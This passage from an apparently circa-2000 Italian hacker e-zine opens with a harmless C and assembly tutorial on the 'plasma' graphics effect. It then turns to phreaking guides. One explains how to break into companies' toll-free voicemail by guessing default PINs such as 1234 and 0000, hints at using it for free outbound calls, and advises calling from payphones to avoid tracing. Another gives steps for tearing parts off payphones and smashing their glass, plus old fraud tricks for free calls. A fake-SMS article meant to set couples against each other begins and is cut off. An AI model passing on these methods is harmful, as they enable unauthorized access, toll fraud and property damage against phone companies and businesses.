Il codice è stato da me testato stato e funziona, dovrebbe funzionare dal 286
in su se avete ancora un 8086 dovete aggiustarela funzione put_pixel perchè
non sono permessi shiftamenti diretti > di 1.

Se il compilatore vi dà un errore sulla funzione put_pixel può darsi che non
abbiate impostato la compilazione per il 286, state attenti quindi.

Note finali:

Mi piacerebbe parlarvi ancora di come fare qualche effetto come il plasma che
è carino o come fare uno sprite editor, come aprire qualche immagine o magari
introdurvi all'utilizzo del compilatore 10.6 C della watcom che permette
l'utilizzo di istruzioni a 32 bit, di opereare in modalità protetta, cioè
consente di utilizzare tutta la memoria disponibile e fare delle belle cosine
(ihihi). (il watcom c è stato utilizzato per produrre molti video giochi)

Se vi ineressa l'argomento io sono reperibile in farmacia, battutaccia.

--> Per commenti, note, proposte o progetti, domande, ecc.
--> chiamatemi: orka4n@yahoo.it

Saluti:
saluto il mio amico Berga, tutti i miei compagni, away, Valk, chi è riuscito
a leggere tutto sto articolo. ;) ciao a tutti e alla prossima....(sperando
che ci sarà)

---Orka4n---
------------------------------------------------------------[ dEmo-cOdInG ]---
===] EFFETTI: IL PLASMA ]=====================================================
-----[ Orka4n ]---------------------------------------------------------------

Ciao a tutti, sono Orka4n e sono ancora qua per parlarvi di un'altro effetto
grafico che si può fare facilmente con il pc, il plasma.

Cosa è il plasma? (domanda difficile)
No non è il sangue, nel nostro caso è solo un effetto grafico, che non ha
nulla a cui vedere con il sangueeee.

Descrizione: (tecnica)

Il plasma non è altro che la somma, calcolata per ogni pixel del nostro
monitor, di alcuni seni (matematici e cosa avevate pensato?) di diversa
frequenza e ampiezza ogni calcolo del seno è strettemente dipendente dalle
coordinate (x,y) del pixel.

Per farla breve un generico pixel(x,y) assume un nuovo colore che dipende
dalle sue coordinate e da un opportuna somma di seni.
Se non avete capito un c***o, non preoccupatevi, capirete in seguito.

Materiale:
Di cosa abbiamo bisogno?
Abbiamo bisogno di alcune cose:

1) le funzioni di base per la grafica (che abbiamo già sviluppato con il
fuoco!) set_vga set_tex set_color

2) una bella palette (RGB per chi non si ricorda) si può anche usare quella
del fuoco

3) calcolare il seno (ci sono già delle funzioni che lo fanno per noi)

Un pò di matematica:

Per chi non è afferrato in matematica, spiegherò cosa diavolo è la funzione
seno, che è il cuore del nostro effetto.

Premetto: da qualche parte ho letto, non mi ricordo dove, che i programmatori
(i demo coder in particolare) non temono la matematica, percui dovete
impararla ;)

Il seno è una funzione periodica, cioè che si ripete ogni tot (nel nostro caso
ogni 360 gradi) e che ha valore massimo 1 e valore minimo -1.
Il seno graficamente appare come un'onda che va da 0 a 1 ,da 1 a 0 ,da 0 a -1
e da -1 a 0 (poi si ripete) Volevo fare un asci art ma è un pò difficile.

Qualcuno di voi si è mai chiesto come diavolo si faccia a calcolare il seno di
un angolo?

Esistono tanti metodi, per esempio le comuni calcolatrici utilizzano un
algoritmo che non è altro che la sommatoria di alcuni termi. Per chi è
afferrato in materia conoscerà benissimo la serie di Taylor eheh. Vi propongo
subito l'algoritmo:

seno(x) (x=radianti) cosa sono i radianti?
I radianti sono un altro modo di misurare un'angolo ecco dei semplici
confronti:
________________________________
| Gradi | Radianti |
|-------|-----------------------|
| 0° |= 0 radianti|
| 30° |= (pigreco/6) " |
| 60° |= (pigreco/3) "
|
| 90° |= (pigreco/2) " |
| 120° |= (2/3 pigreco) "
|
| 135° |= (3/4 pigreco) " | angolo in radianti = ((pigreco)/180)*(angolo
| 150° |= (5/6 pigreco) "
| in gradi)
| 180° |= (pigreco) " |
| ... | | angolo in radianti = (0.017453292)*(angolo
| 360° |= (2pigreco) "
| in gradi)
| 360° |= 2*pigrego " |
|-------|-----------------------|

il simbolo ^ uguale elevamento a potenza
il simbolo ! uguale fattoriale 0!=1 3!=3*2*1 6!=6*5!=6*5*4*3*2*1 .....

seno(x) = x -(x^3)/3! +(x^5)/5! -(x^7)/7! +(x^9)/9! ......

o in c

seno[x]=x;
segno=-1;
fattoriale=1;
potenza=x*x*x;
// parto già dal 3, ma perchè? A voi la risposta ;)
for(i=3; i<n; i+=2){
fattoriale = fattoriale*i*(i-1);
seno[x] = seno[x] + ( segno * potenza / fattoriale );
potenza = potenza*x*x; //da x^3 x^5 ... a x^n
segno = -segno; // cambio il segno ogni volta -1 +1 -1 +1 ....
}

Giusto per finire in bello stile ecco quà anche il coseno
Il coseno non è altro che il seno traslato di 90° (gradi) verso sinistra
percui quanndo x=0 il coseno vale 1 (ricordo che il seno per x=0 valeva 0 e
che assume 1 quando x = 90° o pigreco/2 radianti).

coseno(x) = 1 +(x^2)/2! -(x^4)/4! +(x^6)/6! -(x^8)/8!
La funzione in c ve la risaprmio.

Ma perchè tutta questa fatica, se essite già la funzione che calcola il seno
e coseno in genere presenti nella libreria math.h ?

La risposta è semplice, perchè così avete capito come diavolo fanno i
processori, le calcolatrici a calcolare(che gioco di parole) sta benedetta
funzione che è così tanto importante.
Magari se vi capita fra le mani un vecchio processore (non uno di quelli che
hanno già l'istruzione per calcolare seno e compagnia bella) potete
sbizzarirvi e fare qualcosa.

Dicevo che il seno è importante (anche quello delle ragazze :P) infatti ha
moltissimi utilizzi, che spaziano tutti i campi. Nel nostro caso, per esempio
nella grafica 3d, serve, assieme al coseno, a far rutotare gli oggetti....

Ma ora,finita, questa breve e fastidiosa lezione di matematica(sperando che
qualcuno abbia capito) passiamo alle cose + divertenti.


Iniziamo:
Comiciamo con la parte più interessante, il pseudocodice con un misto di c
del plasma

risoluzione 320x200

for(x=0; x<320; x++){
calcolo i valori rispetto all'ascisse e li salvo
valorexx[x] = 20 * seno(x*4) + 30 * seno(x) + 50 * seno(x*2) ;
\---/ \---/
| |
ampiezza frequenza
ho messo dei valori indicativi, a caso
presumendo che si possa calcolare il seno di un angolo > di 360 tipo 569
}
for(y=0; y<200; y++){
calcolo il valore rispetto a una ordinata (y)
valorey = 30 * seno(y*8) + 50 * seno(y*2) + 20 * seno(y/2) ;

for(x=0; x<320; x++){

faccio un bella media così ogni pixel dipende strettamente dalle sue
coordinate...
valorex = valorexx[x];
colore = (valorex + valorey) / 2;

disegno a video il nuovo colore
disegna(x,y,colore);
}
}

il plasma in effetti è tutto qua, però (lo sapevate che c'erà un però) bisogna
aggiustare un pò di cose:

1) il plasma resta fermo, non si muove
2) vogliamo la codifica in c ;)
3) è troppo lento !!!!

-1-
Per animare sto maledetto plasma abbiamo bisogno di una variabile che mi
facci cambiare il calcolo del seno. Niente di più facile mettiamo un bel
intero che si incrementa fino ad andare in overflow per poi ricominciare dal
valore negativo più piccolo e così via. Il plasma così facendo si muoverà ma
la sua animazione sarà ciclica, dall'altronde cosa vi aspettavate visto che
utiliziamo la funzione seno e che l'intero cicla anche lui?

ecco come si modifica il pseudoCcodice (bello sto termine)

inc=0; //ecco qua il nostro intero che fa muovere il plasma
do{

for(x=0; x<320; x++){
calcolo i valori rispetto alle ascisse (x) e li salvo
valorexx[x] = 20 * seno(x*4 + inc) + 30 * seno(x + inc*4)
+ 50 * seno(x*2 + inc/4) ;
}

for(y=0; y<200; y++){

calcolo il valore rispetto a una ordinata (y)
valorey = 30 * seno(y*8 + inc) + 50 * seno(y*2 + inc/2)
+ 20 * seno(y/2 + inc*8) ;

for(x=0; x<320; x++){
faccio una bella media così che ogni pixel dipende dal valore calcolato
rispetto alla sua x e y e poi disegno
valorex = valorexx[x];
colore = (valorex + valorey) / 2;
disegna(x,y,colore);
}
}
inc++; //incremento l'intero

}while(1); //cicla all'infinito o fino quando non bloccate il processo



-2-
-3-
I seguenti punti gli svilupperemo in ordine inverso, perchè non ho voglia di
scrivere 2 volte il codice del plasma, uno in versione slow e uno in versione
meno slow.

Ma cominciamo allora con il -3-
Come si fa a farlo andare + veloce?

Ragioniamo:
I calcoli portano via tempo alla cpu percui è buona cosa fare all'inizio tutti
quei calcoli ripetitivi e dispendiosi per la cpu. Nel nostro caso ci sono
parecchi calcoli che vengono fatti + volte, anzi un sacco di volte e che
potrebbero essere svolti all'inizio, prendendoci cura di memorizzare i
risultati da qualche parte.

Siete riusciti a capire di cosa parlo? il seno vi dice qualcosa?
Ebbene sì, possiamo calcolare tutti i valori del seno e metterli in un bel
arrey.

Questa tecnica è conosciuta con il nome lookup table, letteralmente guarda
nella tabella di sopra. Alle elementari non avete mai costruito le tavole
pitagoriche (tabelline)?
Sì, allora avete già utilizzato questa tecnica ;)

Ci sono altri calcoli che rallentano?
La risposta è si, e sono tutti i calcoli con operandi in virgola mobile.
Per chiarire l'idea vi dico solo che un processore impiega + tempo per fare
qualsiasi operazione matematica con operandi "
reali" ed è più veloce se si
utilizzano numeri interi. Questo perchè è più difficile rappresentare un
numero "
reale" in binario, di conseguenza risultano più dispendiosi tutti
quei calcoli basati sui numeri "
reali".

La funzione seno restituisce un valore "
reale" compreso tra -1 e 1, percui
bisognerà fare in modo che il risultato (restituito dal seno) non sia più un
numero "
reale" (double) ma un semplice intero.

Per fare ciò moltiplichiamo il valore ("
reale") ottenuto per un valore tippo
1000 o + grande, ma ecco un esempio:

3,141592 * 1000 = 3141,592

Succesivamente prendiamo solo la parte intera (3141) e la salviamo.

Moltiplicare per 1000 equivale a spostare la virgola di 3 posizioni verso
destra, percui noi sappiamo che 3141 corrisponde a 3,141.

In questo modo si perde un pò di precisione, ma nel nostro caso non ce ne
serve + di tanta.

(Comunque si poteva moltiplicare per 1000000(maggior precisione) ma questo va
valutato di caso in caso).

Questa tecnica viene chiamata fixed point (punto fisso) (che non centra con
l'uncinetto).

Ma ecco come lo faremo noi:

Trasformiamo tutti i valori del seno in fixed point moltiplicando il risultato
(double) ottenuto per 1024 (1024?) si perchè qui c'è un'altro trucco sempre
per fare andare le cose + veloci.

1024 = 2^10 e con ciò . Sapete tutti cosa significa shiftare un numero
binario?

Ecco una serie di esempi:

n = 00110 binario = 6 decimale se sposto tutti i bit a sinistra di 1
ottengo
n<<1 = 01100 binari = 12 decimale equivale a moltiplicare n per 2
se invece shifto tutti i bit a destra di 1
n>>1 = 00011 = 3 equivale a dividere(divisione intera) n per 2
poichè la moltiplicazione e la divisione richiedono +
tempo per essere eseguite... ecco svelato il mistero del
1024
n<<10 = n*1024 e n>>10= n/1024

I trucchi non sono finiti qua, infatti se noi memorizziamo i valori del seno
in un arrey di 360 elementi (elemento 0 = seno 0 elemnto 90 = seno 90 gradi),
significa che se vogliamo calcolare un angolo tipo 420 dobbiamo fare :

if(angolo>360) angolo=angolo%360; //% simbolo di resto operazione lenta
ricordo che il seno è ciclico e che seno(420) corrisponde a
seno(420-360)=seno(80) (gradi)

Come facciamo a ovviare a questo piccolo problema che se aggiustato farebbe
andare il nostro plasma un pò più veloce?

1) lasciamo così tanto ...
2) Usiamo un pò di zucca

Qui entra in gioco l'astuzia e ancora una volta la ciclicità.
Ma ecco un'esempio che vi fa subito capire senza tante spiegazioni pallose.

Abbiamo una variabile unsigned char val (8 bit 0..255 i valori possibili)
assegniamo a val 23, tutto va bene
assegniamo a val 256 , troppo grande, ma non dà errore
vediamo cosa c'è in val e troviamo 0
proviamo a mettere in val 320 , troppo grande
vediamo cosa c'è in val e troviamo 320-256=64 . Bingo e ciclica come il seno

infatti seno (400) = seno (400-360) = seno(40)

percui non dobbiamo fare quell'inutile confronto!

Però mi direte in un unsigned char abbiamo massimo 256 valori diversi e non
360 come il seno?

E allora noi usiamo un pò di astuzia e facciamo in modo di avere solo 256
angoli diversi che coprino il range da 0 a 360 gradi. Si usa a tale scopo una
proporzione:

360 elementi / 256 = 1.40625
cioè gli angoli da noi calcolati (256) saranno 0, 1.40625, 2.8125, 4,21875
...cioè tutti i multipli di 1.40625 da 0 a 360.

Un'ultima ottimazzione riguarda il disegno del pixel a video. Se si nota, si
disegna per righe, cioè dall'angolo alto sinistro all'angolo basso destro del
monitor (si procede linearmente lungo la memoria). Percui si potrebbe
sfruttare questo fatto per velocizzare il disegno del pixel. In pratica
elimineremo tutti quei calcoli di conversione che servono per trasformare
una coordinata (x,y) ad un puntatore in memoria.

Le ottimizazzioni sono pressoche terminate, abbaimo un livello di velocità
accettabile, se proprio volete avere il massimo e volete sfruttare la vostra
macchina fino all'osso allora vi consiglio di utilizzare direttamente
l'assembly.

-2- Il codice

Siamo arrivati alla parte più divvertente il codice e allora iniziamo subito.

(compilatore utilizzato turbo c++ 3.0 (Borland), percui se si utilizzano altri
compilatori forse bisogna aggiustare qualcosa.)

#include<conio.h> //-> kbhit e getch (si possono fare in assembly)
#include<math.h> //-> per il seno ;) (sappiamo come calcolarlo anche da
soli)
#inclue<dos.h> //-> per l'outportb e inportb (si possono fare in assembly)

void set_vga() {
asm mov ax,13h //imposta modalità 320(x) x 200(y) (256 colori)
asm int 10h //questo è inline assembly permesso dal c
}

void set_text(){
asm mov ax,03h //imposta modalità testo
asm int 10h //nota la somiglianza con set_vga
}

//converte un angolo da gradi in radianti
double Rad(double ang){ // ang 0..360
return (ang*0.017453292);
}

//fa il negativo di una palette un effetto carino
//l'ho voluto mettere così perchè mi andava, non è neccessario
void negative(void){
int col;
unsigned char r,g,b;
for(col=0;col<256;col++){
outportb(0x3c7,(unsigned char)col);
r = inportb(0x3c9); //leggo il valore r di col
g = inportb(0x3c9); //leggo il valore g di col
b = inportb(0x3c9); //leggo il valore b di col
set_color((unsigned char)col,63-r,63-g,63-b); //trasformo il colore in
negativo...
col++;
}
}

//fa una palette carina, modifiacate a vostro piacimento
void imposta_palette(){

int i,j; //i soliti indici

//33 colori 17+16 0 a 16 17 a 32
for(i=0;i<=16;i++) //17 col
set_color(i,63,i*2,0);

for(i=17;i<=32;i++) //16 col
set_color(i,63,i*2-1,0);

//63 colori
j=62; //33 a 95 =63 colori da 62 a 0
for(i=33;i<96;i++)
set_color(i,j--,63,0);

j=1;
for(i=96;i<160;i++){
set_color(i,0,63-j,j);
j++;
}
set_color(159,0,0,63);

j=1;
for(i=160;i<255;i++){
set_color(i,j,0,63-j);
if(i%2!=0)j++;
}
set_color(255,63,0,0);

}

void main(){

//Variabili:
int valorexx[320];
int seno[256];
int x,y; //contatori
int valorex,valorey,inc,pos,colore;
unsigned char primo,secondo,terzo,car;


//creiamo la look up table del seno 360/256=1.40625
for(x=0;x<256;x++){
seno[x]=int(sin( Rad((double)x * 1.40625) ) * 1024);
}
//impostiamo modalità grafica 320x200
set_vga();
imposta_palette(); //carichaimo una bella palette da noi fatta
//più bella è la palette e più carino sarà l'effetto
inc = 0;
car = 0; //tasto premuto, leggi carattere...

while(car != 27){ //27 corrisponde al tasto ESC
//incremanto la variabile inc
pos = 0; //posizione all'interno della memoria video da 0 a 320x200
inc++;
for(x=0;x<320;x++){
//uso gli sciftamenti invece delle moltiplicazioni e divisioni
primo = (unsigned char) ( (x << 1 ) + (inc ) );
secondo = (unsigned char) ( (x ) + (inc << 2) );
terzo = (unsigned char) ( (x >> 1 ) + (inc >> 2) );
valorexx[x] = 20 * seno[primo]+
30 * seno[secondo]+
50 * seno[terzo];
}
for(y=0;y<200;y++){
primo = (unsigned char) ( (y >> 2) + (inc ) );
secondo = (unsigned char) ( (y ) + (inc << 1) );
terzo = (unsigned char) ( (y ) + (inc >> 1) );
valorey = 40 * seno[primo]+
40 * seno[secondo]+
20 * seno[terzo];

for(x=0;x<320;x++){
valorex = valorexx[x];
//calcolo la media
//la divido per 256 e non per 1024 provate a cambiare
colore = (valorex + valorey) >> 8;
//disegno il pixel a video, molto più veloce di put_pixel!!!!
asm{
mov ax,0xa000
mov es,ax
mov di,pos
mov ax,colore
mov es:[di],al
}
pos++

}
}//chiudo for y...

//se si preme un tasto guardo cosa è
if(kbhit()) car = getch();
//se il tasto è n faccio il negativo
if(car == 'n'){negative();car=0;}

}//chiudo while

//torno in modalità testo
set_text();

}//Fine.


Abbiamo finito.
Ora un pò di consigli:
Provate a modificare di vostra mano il codice, variate le ampiezze e le
frequenze dei vari seni che calcoliamo, vi aiuterà meglio a capire come
diavolo funziona questo effetto.

Usate un pò di creativirà, provate a fare un plasma interlacciato(un pixel si
e uno no), mettete insieme due plasma, fate ruotare la palette o cambiatela
più volte nel corso dell'esecuzione. Insomma rendete l'effetto più carino e
se fate qualcosa di bello fatemi sapere.

Se avete una ragazza fateli vedere cosa avete fatto, sicuramente vi dirà
qualcosa del tipo, ma l'hai fatto tu ?, è bellissimo!!! .....

Conclusioni: Spero di non avervi annoiato e se avete domande, proposte,
progetti ecc la mia e-mail è orka4n@yahoo.it
P.s.: Io ed un mio amico, che saluto ciao jaber, stiamo creando un sito sui
demo e sui videogiochi, da noi prodotti (uno per il momento e non
ancora ultimato). Se volete contribuire o solo volete curiosare, il
sito è --> entropia98.cjb.net
(il sito è ancora in fase di costruzione speriamo di finirlo per metà di
luglio ;) )

Buone vacanze a tutti!!!!!!

---Orka4n---

--------------------------------------------------------------[ pHreAkinG ]---
===] INFIMA GUIDA ALLO SVERGINAMENTO SELVAGGIO DELLE [========================
====] SEGRETERIE TELEFONIKE [=======================
-----[ mR_bIs0n ]-------------------------------------------------------------


keeeee?

Autore: mR_bIs0n
Consumo: merendine e panini farciti alla nutella...
Musika askoltata: vari mp3 direttamente dal mio MPMan... uahhhh 180 karte!!!

Saluti a: Panino, Luigi, Biby, Carmine, Meriak, Mr_Skull, Piccinni, Pr0digY, e
tutti quelli della mailing di Spaghetti Phreakers...

Dedicato a: Daniela ke si Š trovato uno scemo di ragazzo di 1ø ke le fa le
corna... Ilaria ke si Š trovato uno scemo di 3ø ke le fa le corna
(1øaggiornamento: SI E'LASCIATAAAAAAAAAAAAAAA KOME GODOOOOOOOOO)
(2øaggiornamento: si Š messa con uno stronzo di 1ø... bene...
tutte quelle giornate passate a costruire esplosivi serviranno
finalmente a qualkosa)...
alle altre tre Ilarie (una di Roma, una amika della sorella di
Skull e una amika di una mia amika di skuola...)

Fankulo a: tutti i falsi hackers e phreakers, prof.essa di Latino e infine a
quelli di CalcioMania ke non accettato il mio ordine con carta di
credito di soli 7 milioni... uffa ci tenevo ai completi
Casa/Trasferta/Coppa della Lazio... cmq...

**********
* So'Mario * (cioŠ "
sono Mario")
**********
* (1)Intro *
* (2)Dove reperire le segreterie *
* (3)Le segreteire *
* (4)Come agire *
* (5)Una volta indiviuata *
* (6)Cosa ne faccio??? *
* (7)I riski *
* (8)Ne potevi fare a meno??? *
* Una nota preziosa sull'autore *

- 01 - Intro
Bene bene... ci risentiamo dopo tanto tempo... ma sapete... Š stata dura
trovare un'altra rivista ke mi ospitasse... vabbŠ bando alle ciance (mamma
mia ke fastidio ke mi da'questa frase...) ho voluto scrivere quest'artikolo
per fare un po'di luce sulle segreterie telefonike su numero verde... spero vi
sia utile...

- 02 - Dove reperire le segreterie
Una kosa molto importante Š quella di trovare del materiale utile per
reperire numeri verdi e di conseguenza segreterie telefonike... allora vi
potrebbero servire:
- giornali del tipo: "
Famiglia Puttana"... cioŠ "Famiglia Cristiana"...
"
Grazia"...
- giornalacci porno direte voi, vero? ne dubito... comunque visto ke ci
tenete vi lascio dei titoli... "
Super Joint", "Selen, Puledra in calore",
"
Grande e Calda"...
- le Pagine Gialle della Seat... possiamo trovare tanti bei numeretti di
ditte e aziende...
- le Pagine Utili della Mondadori... anke l Š possibile trovare numeri
utili...
- l'elenko telefoniko Š cos vasto di numeri ke diventa difficile trovare
ci• ke ci serve... cmq...
Una volta ke avete un po'di roba potete iniziare a fare le prove per trovare
il numero con la segreteria da sverginare... ma prima...

- 03 - Le segreterie
Esistono vari tipi di segreterie... possiamo dividerle in segreterie a mono
casella (es. le segreterie Memotel) e a multi casella(es. Meridian della
Northen Telekom)... bene vediamo le caratteristike...
le segreterie a mono casella vocale sono delle segreterie molto meno evolute
ma pi— semplici da usare... infatti con le segreterie tipo Memotel c'Š un
solo "
padrone" della segreteria perkŠ esiste appunto una sola casella da
governare... ci• vuol dire ke potete settare il messaggio di benvenuto e
quando kiameranno il numero, ki vi kiamer…, ascolter… subito la vostra voce
registrata...
le segreterie a multi casella, invece, sono delle segreterie con pi— di una
casella vocale... ci• vuol dire ke si possono avere pi— "
padroni" perkŠ ci
sono pi— caselle da governare... cosikkŠ si possono creare comunit… di pi—
utenti ke si skambiano messaggi... queste segreterie sono pi— avanzate... e
quindi pi— complicate... a volte sono piene zeppe di men— vocali ke nemmeno io
riesko a rikordare... a volte bisogna scriverseli... molto spesso kueste
segreterie sono utili anke per fare kiamate gratuite... ma andiamo avanti...

- 04 - Come agire
Bene... una volta kiamato un numero verde bisogna fare delle prove... ora vi
spiego...
per prima kosa kiamate esklusivamente in orari non di ufficio, e cioŠ, dopo
le 18.30... a volte anke alle 19.00... io veramente lo faccio dopo le 21.00
perkŠ coincide proprio coll'orario ke sto seduto al cesso col cell di mia
madre... HEHEHEH....
allora, una volta composto il numero aspettate fino a quando non sentirete
voci o segnali... se dopo un po'di squilli non risponde niente o se invece
sentirete la vocina da castrato della telekozz ke dice: "
Kakkio!
Avete kiamato in orario..." (Veramente kakkio non lo dice...), lasciate
perdere perkŠ sikuramente il numero Š stakkato per motivi di soldi!!!
Se kiamate da cell e dice ke la kiamata proviene da un'area non abilitata,
lasciate perdere e provate da kabina...
se ankora, quando kiamate vi dikono: "
... vi sar… passato un operatore..."
oppure sentite direttamente: "
Pronto sono Asdrubale, come posso aiutarla..."
attakkate immediatamente perkŠ i pezzenti ke avete kiamato non vanno mai a
dormire... ke koglioni...
quando finalmente prendete la linea, nella maggiorparte dei casi sentire una
voce ke avverte ke avete kiamato in orario non di ufficio...
ora bisogna accertarsi se esiste una segreteria, anke se non Š attivata...
quindi per prima kosa aspettate e sentite per intero il messaggio... una
volta finito se stakka immediatamente, rikiamate... se invece vi si presenta
un men— ankora meglio... se invece vi dikono di lasciare un messaggio in
segreteria potrete esultare a piacimento e, volendo, farvi dei pompini da soli
anke se risulterebbe molto difficile...
oki andiamo per ordine: tentate di avvicinare il vostro capo alla zona
pubica... ehm... skusate...
oki andiamo per ordine: se vi riattakka, rikiamate e premete per prima kosa
cancelletto o diesis (#)... ascoltate kosa dice... se non dice niente allora
provate con asterisko (*)... ascoltate kosa dice... se neanke kuello fa
niente allora premete a kazzo tutti i tasti della tastiera... E KE KAKKIO!!!
bene, se al premere del cancelletto sentite qualkosa di nuovo tipo: "
Inserire
il codice di identificazione..." oppure "Inserire il numero di casella
vocale..." siete a kavallo e potete anke tentare, senza esiti konkreti, di
suonare una melodia con vari scorreggi uscenti dal vostro ano...
se vi si presenta un men— siete forse gi… entrati nella segreteria... ma
bisogna aspettare e ascoltare tutto ci• ke dice...
se vi dice di lasciare un messaggio, dite kualkosa di infinitamente stupido e
premete cencelletto... forse dopo potrete entrare nella segreteria...
Tutto potrebbe sembrare un po'confusionario, ma rikordate ke sar… tutto pi—
semplice provando pratikamente...

- 05 - Una volta individuata
Allora se vi trovate ke dovete immettere un kodice, tipo un PIN, nella
maggiorparte dei kasi sar… sikuramente di 4 cifre... non solo perkŠ il kodice
deve essere abbastanza corto da essere rikordato dagli inetti ke lavorano
alla segreteria... ma anke perkŠ Š usato spesso... bene... ora kapite bene ke
nella stragrande maggiorparte dei kasi il kodice Š 1234, usato standard in
molte segreterie... non sar… certo una novit…... seguono a secondo e terzo
posto di popolarit… 0000 e 1111... se non vanno bene anke kuesti provate altre
composizioni semplici... tipo 5555 o 9876... successivamente il kodice deve
essere cambiato... il fatto sta ke nel mondo esistono molti pi— mentekatti di
quanti ne possiamo immaginare... rabbrividiamo... brrrrrr....

- 06 - Cosa ne faccio???
Un kazzo potrei dirvi... ma invece gli usi sono molti!!!
Se Š una segreteria mono-casella potete usarla per iniziare a capire come
funzia il gioko del conquistare segreterie... infatti ne potete fare un uso
proprio... cioŠ voi date il numero agli amici e loro vi lasciano messaggi ke
poi potrete ascoltare... inxomma proprio kome una segreteria ma su numero
verde... quindi completamente gratiz!!!
Mentre se avete trovato una segreteria multi-casella... il gioko si fa
pesantuccio perkŠ esistono metodi per fare uscire chiamate verso altri numeri
partendo dal numero verde... ehehehehhe ma questo cambia da segreteria a
segreteria e quindi vi conviene lavorarci sopra parekkio...

- 07 - I riski
Bene, dopo essermi documentato ben ben sono arrivato ad una conclusione nel
caso dell'illegalit… di questi metodi... il fatto Š ke non esisterebbe nessuna
legislazione ke ci impedisce di utilizzare una segreteria su numero verde...
naturalmente se la ditta a kui avete fottuto la segreteria vedendo nel
tabulato delle kiamate al numero vede ke la maggiorparte delle kiamate
proviene dallo stesso numero e vede anke ke il 90% del traffiko lo avete
ausato voi... potrebbe anke fare una denuncia... comunque voi agite per
lo pi— da kabina... e poi non abbiate mai paura...

- 08 - Ne potevi fare a meno???
Kredo proprio di si... komunque sono contento di essere ritornato di nuovo
nell'ambiente underground digitale e cyberpunk, e spero di continuare a
scrivere in queste e anke in altre riviste...

* Note sull'autore *
mR_bIs0n Š nato a a Santo Billo alla Pozzanghera nel 1984 (come aveva sempre
desiderato). Ha scritto molti artikoli per varie riviste, a volte senza
esserne consapevole. Partecipa ad eventi del tipo "
La sagra del Prepuzio
fritto" e "Fiera degli spazzolini da denti". E'stato pi— volte sposato.
Le mogli non lo sapevano.

---mR_bIs0n---

----------------------------------------------------[ pHreAkinG/Old info$ ]---
===] GUIDA ALL'ASSALTO DELLE CABINE DI MAMMINA TELEKOM [======================
-----[ /zOKA/ ]---------------------------------------------------------------


Consumo: 1 pacco di Camel Light da 10 ( cazzo quanto fumo!! =:),
1 bottiglia di coca da un litro

Rotture di coglioni: il cellulare
Musica ascoltata: Kaos - Fastidio
Fucks to: I FOTTUTI CARAMBA!! mi portate in caserma xchè mi trovate
farmi una kanna in un vikolo!! ma vaffankulo!!!

Adesso cominciamo:

Premesso: io non credo che si possa riuscire a smontare la cabina,
io ci ho provato e non è andato a buon fine ( servono chiavi
particolari che ha solo mamma telekazz ), se conosci qualcuno
che ci è riuscito, con delle chiavi reperibili in ferramenta
fammi mandare un e mail a inkazzato_@hotmail.com in cui mi
spiega la tecnica e le chiavi da utilizzare

===] LO "
SMONTAGGIO" DEI PEZZI [===

Allora, vi ricordo che non credo nello smontaggio, quindi, x i deboli di
cuore, cardiopatici e poliziotti è sconsigliata la visione =:)


LO "
SMONTAGGIO" DI UN ROTOR:

Avete bisogno di: un cuneo ed uno zaino

Niente di più facile, prendete o un cuneo o un piede di porco ( non ricordo
con quanti gradi di inclinazione, cmq il meno inclinato ) e infilatelo fra il
rotor e la cabina stessa e fate forza

LO "
SMONTAGGIO" DI UNA CORNETTA:

Avete bisogno di: Solo le vostre mani

Anche questa è una cosa facilissima, fate fare al cavo della cornetta tanti
giri su se stesso ( HO DETTO TANTI!!! ) e quando si romperà una parte della
"
guaina" metallica, DATE UNO STRAPPO SECCO! Insomma, tirate forte e seccamente
( termini coniati adesso ) ..........cmq un microfono e un altoparlante fanno
comodo a casa =:)


UN SOUVENIR DA PRENDERE DALLE CABINE:

Avete bisogno di: un martello

Avete presente la cornice nelle cabine, quelle che di solito sono a sinistra
del telefono? ecco! su quel vetro un martello sbatte molto bene ( più forte
che potete )!! appena il vetro si frantumerà ( non vi preoccupate, non
schizza ) tirate via dal lato il foglio di plastica e occhio agli occhi
(kaxxo che allitterazione =:) che ora i vetri residui sopra e sotto schizzano!

VECCHI TRUCCHI INUTILIZZABILI ( Special thanks ai miei cugini Cristiano e
Danilo )

Le due schede: prendete una scheda coi soldi dello scatto alla risposta, e
chiamate, appena si esauriscono i soldi, prendete la seconda scheda ( può
essere scarica oppur ci possono essere 15k dentro, kambia un kaxxo ) e
inseritela MA TRATTENETELA COL DITO!! mio cugino Cristiano parlava un ora da
Forlì a Bari con 400 lire...... ora si accorgono e vi chiudono il tel. in
faccia e non saprete mai se la tipa con cui stavate parlando ve la da o no
(w i cellulari =:)

Lo switch: vecchia leggenda, ravanando dietro il display con una scheda come
se steste ( esiste sto verbo? =:) pulendo il cesso dovreste attivare uno
switch che vi libera la linea accreditandovi un bordello di soldi,
ho provato io, nessun esito, ma lo switch c'era, nei vecchi telefoni grigi di
15 anni fa =:)

Prima edizione: il 18 aprile 2000 finita alle 18:15
Seconda revisione: 22 maggio 2000 alle ore 23:16
Terza revisione: 1 Luglio 2000 alle ore 1:12
Questa guida è stata scritt

  
a da

^________^
|!!!HeLp Me|
|->/zOKA/<-|
|Oh sHiT!!!|
------------

mailto: inkazzato_@hotmail.com - djanto@hotmail.com

P.S.

A breve, un articolo SOLO sullo smontaggio di una gabbia monete
"- oN wOrKiNg-"

---/zOKA/---


----------------------------------------------------[ pHreAkinG/Cellulars ]---
===] COME FAR LITIGARE 2 AMICI O FIDANZATI (FAKE SMS) [=======================
-----[ mR_bIs0n ]-------------------------------------------------------------


Indumenti: kannottiera giallognola, mutande altrettanto...
Musica ascoltata: The Doors - The End (e vi assicuro ke potrebbe bastare per
tutto l'art visto ke Š di 11 min...)
Nirvana - Where did you sleep last night
Nirvana - Rape me
Nirvana - Smells like teen spirit
Nirvana - The Man Who Sold The World
Nirvana - Come as you are
Nirvana - On a plain
e molte altre...
Consumo: nulla visto ke mi sono appena alzato... umh... cmq potrei finirmi la
pizza coi peperoni di ieri sera... mi pare sia rimasta anke un po'di
koka kola...
Alla TV: spenta
All'aspirapolvere: mia madre ke mi sta rompendo i koglioni...

Saluti a: Panino, Biby, Carmine, nonkŠ a XaRaBaS, Meriak, Oldiron, Dante,
Nobo, Zero, |M4X|, e magari ki mi sto dimentikando... ah
l'immankabile Giorgio Qulo....

Fuck to: la skuola anke se Š finita, il pullotto pieno di merda skifosa
puzzolente ke rompe i koglioni se io e i miei amici ci mettiamo a
giokare a calcio nel kampo vicino kasa (illegalmente)...

Dedikato a: tutte le belle ragazze, soprattutto perkŠ di sto periodo non ho
una ragazza in partikolare... uff... e ke ci devo fare, hanno 16
anni e si trovano il ragazzo ultraquarantenne ke percepisce la
pensione...

***
______________________________________________________________
/ \
